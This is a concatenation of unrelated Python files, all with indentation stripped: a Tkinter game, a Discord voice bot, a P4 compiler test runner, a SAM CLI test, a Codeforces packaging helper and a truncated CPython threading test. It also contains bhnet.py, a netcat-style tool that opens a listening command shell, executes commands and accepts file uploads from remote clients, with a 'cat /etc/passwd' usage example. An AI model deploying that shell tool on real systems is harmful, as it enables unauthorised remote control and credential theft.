monsterImage = monsterImages[random.randint(0, len(monsterImages) - 1)]
trophy = ImageTk.PhotoImage(file="res/trophyBG.png")
grave = ImageTk.PhotoImage(file="res/graveBG.png")
# Creates the initial pumpkin
def createPumpkin():
global pumpkin
##SNAKE MODIFIED 1.1 SOHVA
pumpkin = (1, 1)
def newGame():
global monsterImage
global monsterImages
global pumpkin
global sGrid
global food
global columns
global rows
global game_on
global direction
global new_direction
global foodlist
global level
global lives
lives = 7
liveslabel.configure(text = "You have "+str(lives)+" attempts")
for row in sGrid:
for item in row:
item.configure(image = grass, bg = "grey")
refreshLives()
# liveslabel.configure(text = "You have "+str(lives)+" attempts")
monsterImage = monsterImages[random.randint(0,len(monsterImages)-1)]
level = 1
createWalls(level)
createMonsters(level)
createPumpkin()
sGrid[pumpkin[0]][pumpkin[1]].configure(image = pumpkinImage)
foodlist=[]
#get_score()
global numFood
numFood = random.randint(1,3)
for i in range (0, numFood):
addFood()
foodlist.append(food)
for food in foodlist:
sGrid[food[0]][food[1]].configure(image = foodimage)
game_on = True
direction = (0,-1)
new_direction = (0,-1)
levellabel.configure(text = "Level: " + str(level))
def addFood():
global pumpkin
global sGrid
global food
global columns
global rows
global foodlist
while True:
# Choses a random location
chosen = (random.randint(2, rows - 3), random.randint(2, columns - 3))
# Checks that it's not in the pumpkin
monLocs = giveMonLocs(monsters)
if chosen != pumpkin and chosen not in walls and chosen != finish and chosen not in monLocs:
food = chosen
foodlist.append(food)
break
def game():
global otherFinished
global goToNextLevel
global goToDead
global pumpkin
global direction
global game_on
global highscore
global numFood
global foodlist
global updateNextButton
global level
createWalls(level)
global lives
global moves
global movesOnce
refreshLives()
statelabel.configure(text="Task: get the trophies")
##Adding monsters 1.3 SOHVA
global monsters
##Adding finish 1.4 Sohva
global finish
##Adding wall 1.5 Sohva
global walls
sGrid[finish[0]][finish[1]].configure(image=trophy)
game_on = True
for monster in monsters:
monloc = monster.getLoc()
sGrid[monloc[0]][monloc[1]].configure(image=grass)
monster.move()
monloc = monster.getLoc()
sGrid[monloc[0]][monloc[1]].configure(image=monsterImage)
loc = pumpkin
# Update the location
if moves or movesOnce:
newloc = ((loc[0] + direction[0]) % rows, (loc[1] + direction[1]) % columns)
movesOnce = False
for wall in walls:
if newloc == wall:
newloc = loc
else:
newloc = loc
##Check for the collision with monster 1.3 SOHVA
for monster in monsters:
if newloc == monster.getLoc():
lives -= 1
refreshLives()
if lives == 0:
dead()
send("xDead")
print "Hit a monster"
newloc = (1, 1)
if newloc == finish:
send("xOneFinished")
##FOR TESTING
#otherFinished = True
##
if otherFinished == True:
send("xAllFinished")
nextButton.configure(state="normal")
if level == 3:
winwin()
else:
win()
print "Game nearly Won!"
for i in range(len(foodlist)):
if newloc == foodlist[i]:
lives -= 1
refreshLives()
if lives == 0:
dead()
nextloc = newloc[0] - direction[0], newloc[1] - direction[1]
while nextloc not in walls:
newloc = nextloc
nextloc = newloc[0] - direction[0], newloc[1] - direction[1]
sGrid[pumpkin[0]][pumpkin[1]].configure(image=grass)
pumpkin = newloc
# Make the head to point to the right direction
nextloc = (newloc[0] + direction[0], newloc[1] + direction[1])
nextLocs = giveNextLocs(pumpkin)
pumpkinhead = pumpkinImage
if finish in nextLocs or newloc == finish:
pumpkinhead = happyImage
else:
for loc in nextLocs:
if loc in foodlist:
pumpkinhead = scaredImage
break
for monster in monsters:
if monster.getLoc() in nextLocs:
pumpkinhead = scaredImage
break
sGrid[newloc[0]][newloc[1]].configure(image=pumpkinhead)
if goToNextLevel:
levelUp()
goToNextLevel = False
if updateNextButton:
nextButton.configure(state="normal")
updateNextButton = False
if goToDead:
dead()
goToDead = False
##Version 1.2 SOHVA ADDED MOVES VARIABLE FOR DECIDING WHETHER PLAYER MOVES OR NOT
##Version 1.22 SOHVA FIXED A BUG WITH THE SNAKE MOVEMENT
def turnRight():
global direction
global new_direction
global moves
global movesOnce
new_direction = (0, 1)
moves = True
movesOnce = True
def turnLeft():
global direction
global new_direction
global moves
global movesOnce
new_direction = (0, -1)
moves = True
movesOnce = True
def turnUp():
global direction
global new_direction
global moves
global movesOnce
new_direction = (-1, 0)
moves = True
movesOnce = True
def turnDown():
global direction
global new_direction
global moves
global movesOnce
new_direction = (1, 0)
moves = True
movesOnce = True
def pause():
global game_on
game_on = not game_on
##VERSION 1.2 SOHVA STOPS PLAYER MOVEMENT
def stop():
global moves
moves = False
def createWalls(level):
global walls
walls = []
walls = wallcreator.createWalls(level)
for wall in walls:
sGrid[wall[0]][wall[1]].configure(image=grave)
def createMonsters(level):
global monsters
monsters = monstercreator.createMonsters(level)
def levelUp():
global otherFinished
global nextButton
otherFinished = False
global foodlist
global walls
global monsters
global level
global pumpkin
global monsterImage
global monsterImages
monsterImage = monsterImages[random.randint(0, len(monsterImages) - 1)]
for row in sGrid:
for square in row:
square.configure(image=grass)
nextButton.config(state="disabled")
game_on = True
pumpkin = (1, 1)
level += 1
send("xLevelUp" + str(level))
levellabel.configure(text="Level: " + str(level))
createMonsters(level)
createWalls(level)
foodlist = []
addFood()
for food in foodlist:
sGrid[food[0]][food[1]].configure(image=foodimage)
nextButton.configure(state="disabled")
# Gives the locations in which the monsters can be
def giveMonLocs(monsters):
locs = []
for monster in monsters:
locs += monster.getRoute()
return locs
def giveNextLocs(pumpkin):
return [(pumpkin[0] - 1, pumpkin[1]), (pumpkin[0] + 1, pumpkin[1]), \
(pumpkin[0], pumpkin[1] - 1), (pumpkin[0], pumpkin[1] + 1)]
lives = 7
liveslabel = Tkinter.Label(top, text=str(lives) + " lives left", fg="brown", background='light yellow')
def refreshLives():
global liveslabel
global lives
liveslabel.config(text=str(lives) + " lives left")
columns = 15
rows = 10
game_on = True
pumpkin = []
highscore = 0
foodlist = []
finish = (rows - 3, columns - 3)
walls = []
refreshLives()
liveslabel.grid(row=0, columnspan=5, column=4)
statelabel = Tkinter.Label(top, text="", font=("Helvetica", 10, "bold italic"), fg="brown", background='light yellow')
statelabel.grid(row=0, columnspan=6, column=9)
# Create the grid
sGrid = []
for rownum in range(rows):
row = []
for colnum in range(columns):
label = Tkinter.Label(top, image=grass, bg="#6d6764", bd=0)
row += [label]
label.grid(row=rownum + 1, column=colnum)
sGrid += [row]
createPumpkin()
createMonsters(1)
##1.6 SOHVA adds the variable for level
level = 1
levellabel = Tkinter.Label(top, text="Level: " + str(level),fg="brown", background='light yellow')
levellabel.grid(row=0, columnspan=5, column=0)
createWalls(1)
# Place the food
addFood()
for food in foodlist:
sGrid[food[0]][food[1]].configure(image=foodimage)
# Tells how to change coordinates
# up = (1,0); down = (-1,0); left = (0,-1); right = (0,1)
direction = (0, -1) # Left
new_direction = (0, -1)
## VERSION 1.2 SOHVA a boolean for the player movement
moves = False
movesOnce = False
otherFinished = False
updateNextButton = False
goToNextLevel = False
goToDead = False
quitButton = Tkinter.Button(top, text="Quit",fg="brown", command=top.destroy, background='light yellow', relief = RIDGE, bd=3,highlightcolor="red")
quitButton.grid(row=0, column=columns + 1, rowspan=2)
newButton = Tkinter.Button(top, text="New Game", fg="brown",command=newGame, background='light yellow', relief = RIDGE, bd=3,highlightcolor="red")
newButton.grid(row=1, column=columns + 1, rowspan=2)
nextButton = Tkinter.Button(top, text="Next Level", fg="brown",command=levelUp, state="disabled", background='light yellow', relief = RIDGE, bd=3, highlightcolor="red")
nextButton.grid(row=2, column=columns + 1, rowspan=2)
top.title("Why Not a Pumpkin Apocalypse?")
# Keeps track on the level
def dead():
global game_on
global statelabel
if game_on:
game_on = False
statelabel.configure(text="Game over")
def winwin():
global statelabel
statelabel.configure(text="You win!")
def win():
# global game_on
global statelabel
statelabel.configure(text="Good job! Keep going")
while True:
if game_on:
game()
for i in range(10):
time.sleep((0.35 - level * 0.05) / 10)
top.update_idletasks()
top.update()
direction = new_direction
|
main.py
|
import discord
import requests
from discord.ext import commands
from threading import Thread, Lock
from datetime import datetime
from time import sleep
from flask import Flask, request
import values
client = commands.Bot(command_prefix=values.command_prefix)
lock = Lock() # Locked by the say command. released by the callback from resemble that gets sent to the flask app
@client.command()
async def join(ctx):
voiceChannel = discord.utils.get(ctx.guild.voice_channels, name=values.Channel_Name)
voice = discord.utils.get(client.voice_clients, guild=ctx.guild)
if voice is None or not voice.is_connected():
await voiceChannel.connect()
#voice = discord.utils.get(client.voice_clients, guild=ctx.guild)
#voice.play(discord.FFmpegPCMAudio("doom.wav")) # add a wave file that you want it to say upon entry
@client.command()
async def say(ctx, val : str):
if lock.locked(): # only one thing can be said at a time
return
lock.acquire() # lock until the callback has been sent
voiceChannel = discord.utils.get(ctx.guild.voice_channels, name=values.Channel_Name)
voice = discord.utils.get(client.voice_clients, guild=ctx.guild)
if voice is None or not voice.is_connected():
await voiceChannel.connect()
voice = discord.utils.get(client.voice_clients, guild=ctx.guild)
# create the line that you want read in the voice. to do this get the whole message and delete the command prefix
create_Voice_Clip(ctx.message.content.replace(values.command_prefix + "say ", ''))
with lock: # this lock will wait for the callback from resemble
voice.play(discord.FFmpegPCMAudio("w.wav"))
@client.command()
async def away(ctx):
voiceChannel = discord.utils.get(ctx.guild.voice_channels, name='Viego\'s Cracked')
#voiceChannel = discord.utils.get(ctx.guild.voice_channels, name='General')
voice = discord.utils.get(client.voice_clients, guild=ctx.guild)
if voice.is_connected():
voice.play(discord.FFmpegPCMAudio("SlipAway.wav"))
sleep(2.1)
await voice.disconnect()
def create_Voice_Clip(val):
url = "https://app.resemble.ai/api/v1/projects/"+ values.projectID +"/clips"
headers = {
'Authorization': 'Token token="'+values.resemble_token+'"',
'Content-Type': 'application/json'}
data = {
'data': {
'title': str(datetime.now().timestamp()),
'body': val,
'voice': values.voiceID
},
"callback_uri": "http://"+values.IP+"/service"
}
response = requests.post(url, headers=headers, json=data)
print(response)
# Flask App for callback from resemble.ai
app = Flask(__name__)
@app.route("/service", methods=['POST'])
def hello():
try:
data = request.get_json()
download(data['url'])
finally:
lock.release()
def download(url):
r = requests.get(url, allow_redirects=True)
open("w.wav", "wb").write(r.content)
c = Thread(target=client.run, args=(values.token,))
c.start() # start discord bot
f = Thread(target=app.run, kwargs={'host': '0.0.0.0', 'debug': False})
f.start() # start flask app
|
run-bmv2-test.py
|
#!/usr/bin/env python
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Runs the compiler on a sample P4 program generating code for the BMv2
# behavioral model simulator
from __future__ import print_function
from subprocess import Popen
from threading import Thread
import json
import sys
import re
import os
import stat
import tempfile
import shutil
import difflib
import subprocess
import time
import random
import errno
from string import maketrans
try:
from scapy.layers.all import *
from scapy.utils import *
except ImportError:
pass
from bmv2stf import RunBMV2
SUCCESS = 0
FAILURE = 1
class Options(object):
def __init__(self):
self.binary = "" # this program's name
self.cleanupTmp = True # if false do not remote tmp folder created
self.p4Filename = "" # file that is being compiled
self.compilerSrcDir = "" # path to compiler source tree
self.verbose = False
self.replace = False # replace previous outputs
self.compilerOptions = []
self.hasBMv2 = False # Is the behavioral model installed?
self.runDebugger = False
self.observationLog = None # Log packets produced by the BMV2 model if path to log is supplied
def nextWord(text, sep = " "):
# Split a text at the indicated separator.
# Note that the separator can be a string.
# Separator is discarded.
pos = text.find(sep)
if pos < 0:
return text, ""
l, r = text[0:pos].strip(), text[pos+len(sep):len(text)].strip()
# print(text, "/", sep, "->", l, "#", r)
return l, r
class ConfigH(object):
# Represents an autoconf config.h file
# fortunately the structure of these files is very constrained
def __init__(self, file):
self.file = file
self.vars = {}
with open(file) as a:
self.text = a.read()
self.ok = False
self.parse()
def parse(self):
while self.text != "":
self.text = self.text.strip()
if self.text.startswith("/*"):
end = self.text.find("*/")
if end < 1:
reportError("Unterminated comment in config file")
return
self.text = self.text[end+2:len(self.text)]
elif self.text.startswith("#define"):
define, self.text = nextWord(self.text)
macro, self.text = nextWord(self.text)
value, self.text = nextWord(self.text, "\n")
self.vars[macro] = value
elif self.text.startswith("#ifndef"):
junk, self.text = nextWord(self.text, "#endif")
else:
reportError("Unexpected text:", self.text)
return
self.ok = True
def __str__(self):
return str(self.vars)
def usage(options):
name = options.binary
print(name, "usage:")
print(name, "rootdir [options] file.p4")
print("Invokes compiler on the supplied file, possibly adding extra arguments")
print("`rootdir` is the root directory of the compiler source tree")
print("options:")
print(" -b: do not remove temporary results for failing tests")
print(" -v: verbose operation")
print(" -f: replace reference outputs with newly generated ones")
print(" -a option: pass this option to the compiler")
print(" -gdb: run compiler under gdb")
print(" --pp file: pass this option to the compiler")
print(" -observation-log <file>: save packet output to <file>")
def isError(p4filename):
# True if the filename represents a p4 program that should fail
return "_errors" in p4filename
def reportError(*message):
print("***", *message)
class Local(object):
# object to hold local vars accessable to nested functions
pass
def run_timeout(options, args, timeout, stderr):
if options.verbose:
print("Executing ", " ".join(args))
local = Local()
local.process = None
def target():
procstderr = None
if stderr is not None:
procstderr = open(stderr, "w")
local.process = Popen(args, stderr=procstderr)
local.process.wait()
thread = Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
print("Timeout ", " ".join(args), file=sys.stderr)
local.process.terminate()
thread.join()
if local.process is None:
# never even started
reportError("Process failed to start")
return -1
if options.verbose:
print("Exit code ", local.process.returncode)
return local.process.returncode
timeout = 10 * 60
def run_model(options, tmpdir, jsonfile):
if not options.hasBMv2:
return SUCCESS
# We can do this if an *.stf file is present
basename = os.path.basename(options.p4filename)
base, ext = os.path.splitext(basename)
dirname = os.path.dirname(options.p4filename)
testfile = dirname + "/" + base + ".stf"
print("Check for ", testfile)
if not os.path.isfile(testfile):
# If no stf file is present just use the empty file
testfile = dirname + "/empty.stf"
if not os.path.isfile(testfile):
# If no empty.stf present, don't try to run the model at all
return SUCCESS
bmv2 = RunBMV2(tmpdir, options, jsonfile)
result = bmv2.generate_model_inputs(testfile)
if result != SUCCESS:
return result
result = bmv2.run()
if result != SUCCESS:
return result
result = bmv2.checkOutputs()
return result
def process_file(options, argv):
assert isinstance(options, Options)
tmpdir = tempfile.mkdtemp(dir=".")
basename = os.path.basename(options.p4filename)
base, ext = os.path.splitext(basename)
dirname = os.path.dirname(options.p4filename)
expected_dirname = dirname + "_outputs" # expected outputs are here
if options.verbose:
print("Writing temporary files into ", tmpdir)
if options.testName:
jsonfile = options.testName + ".json"
else:
jsonfile = tmpdir + "/" + base + ".json"
stderr = tmpdir + "/" + basename + "-stderr"
if not os.path.isfile(options.p4filename):
raise Exception("No such file " + options.p4filename)
args = ["./p4c-bmv2", "-o", jsonfile] + options.compilerOptions
if "p4_14" in options.p4filename or "v1_samples" in options.p4filename:
args.extend(["--std", "p4-14"]);
args.extend(argv) # includes p4filename
if options.runDebugger:
args[0:0] = options.runDebugger.split()
os.execvp(args[0], args)
result = run_timeout(options, args, timeout, stderr)
if result != SUCCESS:
print("Error compiling")
print("".join(open(stderr).readlines()))
# If the compiler crashed fail the test
if 'Compiler Bug' in open(stderr).readlines():
return FAILURE
expected_error = isError(options.p4filename)
if expected_error:
# invert result
if result == SUCCESS:
result = FAILURE
else:
result = SUCCESS
if result == SUCCESS and not expected_error:
result = run_model(options, tmpdir, jsonfile);
if options.cleanupTmp:
if options.verbose:
print("Removing", tmpdir)
shutil.rmtree(tmpdir)
return result
######################### main
def main(argv):
options = Options()
options.binary = argv[0]
if len(argv) <= 2:
usage(options)
sys.exit(FAILURE)
options.compilerSrcDir = argv[1]
argv = argv[2:]
if not os.path.isdir(options.compilerSrcDir):
print(options.compilerSrcDir + " is not a folder", file=sys.stderr)
usage(options)
sys.exit(FAILURE)
while argv[0][0] == '-':
if argv[0] == "-b":
options.cleanupTmp = False
elif argv[0] == "-v":
options.verbose = True
elif argv[0] == "-f":
options.replace = True
elif argv[0] == "-a":
if len(argv) == 0:
reportError("Missing argument for -a option")
usage(options)
sys.exit(FAILURE)
else:
options.compilerOptions += argv[1].split();
argv = argv[1:]
elif argv[0][1] == 'D' or argv[0][1] == 'I' or argv[0][1] == 'T':
options.compilerOptions.append(argv[0])
elif argv[0] == "-gdb":
options.runDebugger = "gdb --args"
elif argv[0] == '-observation-log':
if len(argv) == 0:
reportError("Missing argument for -observation-log option")
usage(options)
sys.exit(FAILURE)
else:
options.observationLog = argv[1]
argv = argv[1:]
elif argv[0] == "--pp":
options.compilerOptions.append(argv[0])
argv = argv[1:]
options.compilerOptions.append(argv[0])
else:
reportError("Unknown option ", argv[0])
usage(options)
sys.exit(FAILURE)
argv = argv[1:]
config = ConfigH("config.h")
if not config.ok:
print("Error parsing config.h")
sys.exit(FAILURE)
options.hasBMv2 = "HAVE_SIMPLE_SWITCH" in config.vars
if not options.hasBMv2:
reportError("config.h indicates that BMv2 is not installed; will skip running BMv2 tests")
options.p4filename=argv[-1]
options.testName = None
if options.p4filename.startswith(options.compilerSrcDir):
options.testName = options.p4filename[len(options.compilerSrcDir):];
if options.testName.startswith('/'):
options.testName = options.testName[1:]
if options.testName.endswith('.p4'):
options.testName = options.testName[:-3]
options.testName = "bmv2/" + options.testName
if not options.observationLog:
if options.testName:
options.observationLog = os.path.join('%s.p4.obs' % options.testName)
else:
basename = os.path.basename(options.p4filename)
base, ext = os.path.splitext(basename)
dirname = os.path.dirname(options.p4filename)
options.observationLog = os.path.join(dirname, '%s.p4.obs' % base)
try:
result = process_file(options, argv)
except Exception as e:
print("Exception ", e)
sys.exit(FAILURE)
if result != SUCCESS:
reportError("Test failed")
sys.exit(result)
if __name__ == "__main__":
main(sys.argv)
|
test_local_api_service.py
|
"""
Function test for Local API service
"""
import os
import shutil
import random
import threading
import requests
import time
import logging
from samcli.commands.local.lib import provider
from samcli.commands.local.lib.local_lambda import LocalLambdaRunner
from samcli.local.lambdafn.runtime import LambdaRuntime
from samcli.local.docker.manager import ContainerManager
from samcli.commands.local.lib.local_api_service import LocalApiService
from tests.functional.function_code import nodejs_lambda, API_GATEWAY_ECHO_EVENT
from unittest import TestCase
from mock import Mock, patch
logging.basicConfig(level=logging.INFO)
class TestFunctionalLocalLambda(TestCase):
def setUp(self):
self.host = "0.0.0.0"
self.port = random.randint(30000, 40000) # get a random port
self.url = "http://{}:{}".format(self.host, self.port)
self.code_abs_path = nodejs_lambda(API_GATEWAY_ECHO_EVENT)
# Let's convert this absolute path to relative path. Let the parent be the CWD, and codeuri be the folder
self.cwd = os.path.dirname(self.code_abs_path)
self.code_uri = os.path.relpath(self.code_abs_path, self.cwd) # Get relative path with respect to CWD
# Setup a static file in the directory
self.static_dir = "mystaticdir"
self.static_file_name = "myfile.txt"
self.static_file_content = "This is a static file"
self._setup_static_file(os.path.join(self.cwd, self.static_dir), # Create static directory with in cwd
self.static_file_name,
self.static_file_content)
# Create one Lambda function
self.function_name = "name"
self.function = provider.Function(name=self.function_name, runtime="nodejs4.3", memory=256, timeout=5,
handler="index.handler", codeuri=self.code_uri,
environment={},
rolearn=None)
self.mock_function_provider = Mock()
self.mock_function_provider.get.return_value = self.function
# Setup two APIs pointing to the same function
apis = [
provider.Api(path="/get", method="GET", function_name=self.function_name, cors="cors"),
provider.Api(path="/post", method="POST", function_name=self.function_name, cors="cors"),
]
self.api_provider_mock = Mock()
self.api_provider_mock.get_all.return_value = apis
# Now wire up the Lambda invoker and pass it through the context
self.lambda_invoke_context_mock = Mock()
manager = ContainerManager()
local_runtime = LambdaRuntime(manager)
lambda_runner = LocalLambdaRunner(local_runtime, self.mock_function_provider, self.cwd, env_vars_values=None,
debug_args=None, debug_port=None, aws_profile=None)
self.lambda_invoke_context_mock.local_lambda_runner = lambda_runner
self.lambda_invoke_context_mock.get_cwd.return_value = self.cwd
def tearDown(self):
shutil.rmtree(self.code_abs_path)
@patch("samcli.commands.local.lib.local_api_service.SamApiProvider")
def test_must_start_service_and_serve_endpoints(self, SamApiProviderMock):
SamApiProviderMock.return_value = self.api_provider_mock
local_service = LocalApiService(self.lambda_invoke_context_mock,
self.port,
self.host,
None) # No static directory
self._start_service_thread(local_service)
response = requests.get(self.url + '/get')
self.assertEquals(response.status_code, 200)
response = requests.post(self.url + '/post', {})
self.assertEquals(response.status_code, 200)
response = requests.get(self.url + '/post')
self.assertEquals(response.status_code, 403) # "HTTP GET /post" must not exist
@patch("samcli.commands.local.lib.local_api_service.SamApiProvider")
def test_must_serve_static_files(self, SamApiProviderMock):
SamApiProviderMock.return_value = self.api_provider_mock
local_service = LocalApiService(self.lambda_invoke_context_mock,
self.port,
self.host,
self.static_dir) # Mount the static directory
self._start_service_thread(local_service)
# NOTE: The URL does not contain the static_dir because this directory is mounted directly at /
response = requests.get("{}/{}".format(self.url, self.static_file_name))
self.assertEquals(response.status_code, 200)
self.assertEquals(self.static_file_content, response.text)
@staticmethod
def _start_service_thread(service):
t = threading.Thread(name='thread', target=service.start, args=())
t.setDaemon(True)
t.start()
time.sleep(1) # Wait for the Web server to spin up
@staticmethod
def _setup_static_file(directory, filename, contents):
if not os.path.isdir(directory):
os.mkdir(directory)
with open(os.path.join(directory, filename), "w") as fp:
fp.write(contents)
|
bhnet.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import socket
import getopt
import threading
import subprocess
# グローバル変数の定義
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
def usage():
print "BHP Net Tool"
print
print "Usage: bhnet.py -t target_host -p port"
print "-l --listen - listen on [host]:[port] for"
print " incoming connections"
print "-e --execute=file_to_run - execute the given file upon"
print " receiving a connection"
print "-c --command - initialize a command shell"
print "-u --upload=destination - upon receiving connection upload a"
print " file and write to [destination]"
print
print
print "Examples: "
print "bhnet.py -t 192.168.0.1 -p 5555 -l -c"
print "bhnet.py -t 192.168.0.1 -p 5555 -l -u c:\\target.exe"
print "bhnet.py -t 192.168.0.1 -p 5555 -l -e \"cat /etc/passwd\""
print "echo 'ABCDEFGHI' | ./bhnet.py -t 192.168.11.12 -p 135"
sys.exit(0)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
# コマンドラインオプションの読み込み
try:
opts, args = getopt.getopt(
sys.argv[1:],
"hle:t:p:cu:",
["help", "listen", "execute=", "target=",
"port=", "command", "upload="])
except getopt.GetoptError as err:
print str(err)
usage()
for o,a in opts:
if o in ("-h", "--help"):
usage()
elif o in ("-l", "--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False, "Unhandled Option"
# 接続を待機する?それとも標準入力からデータを受け取って送信する?
if not listen and len(target) and port > 0:
# コマンドラインからの入力を`buffer`に格納する。
# 入力がこないと処理が継続されないので
# 標準入力にデータを送らない場合は CTRL-D を入力すること。
buffer = sys.stdin.read()
# データ送信
client_sender(buffer)
# 接続待機を開始。
# コマンドラインオプションに応じて、ファイルアップロード、
# コマンド実行、コマンドシェルの実行を行う。
if listen:
server_loop()
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# 標的ホストへの接続
client.connect((target, port))
if len(buffer):
client.send(buffer)
while True:
# 標的ホストからのデータを待機
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response+= data
if recv_len < 4096:
break
print response,
# 追加の入力を待機
buffer = raw_input("")
buffer += "\n"
# データの送信
client.send(buffer)
except:
print "[*] Exception! Exiting."
# 接続の終了
client.close()
def server_loop():
global target
# 待機するIPアドレスが指定されていない場合は
# 全てのインタフェースで接続を待機
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target,port))
server.listen(5)
while True:
client_socket, addr = server.accept()
# クライアントからの新しい接続を処理するスレッドの起動
client_thread = threading.Thread(
target=client_handler, args=(client_socket,))
client_thread.start()
def run_command(command):
# 文字列の末尾の改行を削除
command = command.rstrip()
# コマンドを実行し出力結果を取得
try:
output = subprocess.check_output(
command,stderr=subprocess.STDOUT, shell=True)
except:
output = "Failed to execute command.\r\n"
# 出力結果をクライアントに送信
return output
def client_handler(client_socket):
global upload
global execute
global command
# ファイルアップロードを指定されているかどうかの確認
if len(upload_destination):
# すべてのデータを読み取り、指定されたファイルにデータを書き込み
file_buffer = ""
# 受信データがなくなるまでデータ受信を継続
while True:
data = client_socket.recv(1024)
if len(data) == 0:
break
else:
file_buffer += data
# 受信したデータをファイルに書き込み
try:
file_descriptor = open(upload_destination,"wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
# ファイル書き込みの成否を通知
client_socket.send(
"Successfully saved file to %s\r\n" % upload_destination)
except:
client_socket.send(
"Failed to save file to %s\r\n" % upload_destination)
# コマンド実行を指定されているかどうかの確認
if len(execute):
# コマンドの実行
output = run_command(execute)
client_socket.send(output)
# コマンドシェルの実行を指定されている場合の処理
if command:
# プロンプトの表示
prompt = "<BHP:#> "
client_socket.send(prompt)
while True:
# 改行(エンターキー)を受け取るまでデータを受信
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
# コマンドの実行結果を取得
response = run_command(cmd_buffer)
response += prompt
# コマンドの実行結果を送信
client_socket.send(response)
main()
|
codeforces.py
|
import io
import os
import random
import subprocess
import threading
import zipfile
from datetime import datetime
from xml.etree import ElementTree
from django.conf import settings
from account.models import User
from polygon.models import CodeforcesPackage
def get_directory_size(dir):
total_size = 0
for top, dirs, files in os.walk(dir):
for f in files:
fp = os.path.join(top, f)
total_size += os.path.getsize(fp)
return total_size / 1048576
def get_working_directory(dst_dir):
return os.path.join(settings.REPO_DIR, dst_dir)
def create_task(problem_id: str, created_by: User, init_file=None):
cf_settings = settings.CODEFORCES_POLYGON_CONFIG
dst_dir = "cf_%s_%s" % (problem_id, "".join([random.choice("0123456789abcdef") for _ in range(6)]))
dst_address = get_working_directory(dst_dir)
if init_file is not None:
with open(os.path.join(dst_address, "package.zip"), "wb") as f:
f.write(init_file.read())
def create_task_helper():
package = CodeforcesPackage.objects.create(created_by=created_by, dir_name=dst_dir, remote_problem_id=problem_id)
log_dir = os.path.join(dst_address, "logs")
os.makedirs(log_dir, exist_ok=True)
with open(os.path.join(log_dir, "django.log"), "w") as stderr:
subp = subprocess.run(["sudo", cf_settings["script"], cf_settings["key"], cf_settings["secret"], problem_id, dst_address],
stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL, stderr=stderr)
if subp.returncode:
package.status = 1
else:
try:
tree = ElementTree.parse(os.path.join(dst_address, "package", "problem.xml"))
root = tree.getroot()
package.short_name = root.attrib["short-name"]
package.revision = root.attrib["revision"]
package.size = get_directory_size(os.path.join(dst_address, "package"))
package.status = 0
except:
package.status = 1
package.running_time = (datetime.now() - package.create_time).total_seconds()
package.status = 1 if subp.returncode else 0
package.save()
threading.Thread(target=create_task_helper).start()
def zip_directory(dir):
bytes_io = io.BytesIO()
with zipfile.ZipFile(bytes_io, "w") as zipFile:
for top, dirs, files in os.walk(dir):
for file in files:
zipFile.write(os.path.join(top, file), os.path.relpath(os.path.join(top, file), dir))
bytes_io.seek(0)
return bytes_io.read()
def pack_log_files(package: CodeforcesPackage):
return zip_directory(os.path.join(get_working_directory(package.dir_name), "logs"))
def pack_package(package: CodeforcesPackage):
return zip_directory(os.path.join(get_working_directory(package.dir_name), "package"))
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import verbose, import_module, cpython_only
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
import textwrap
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
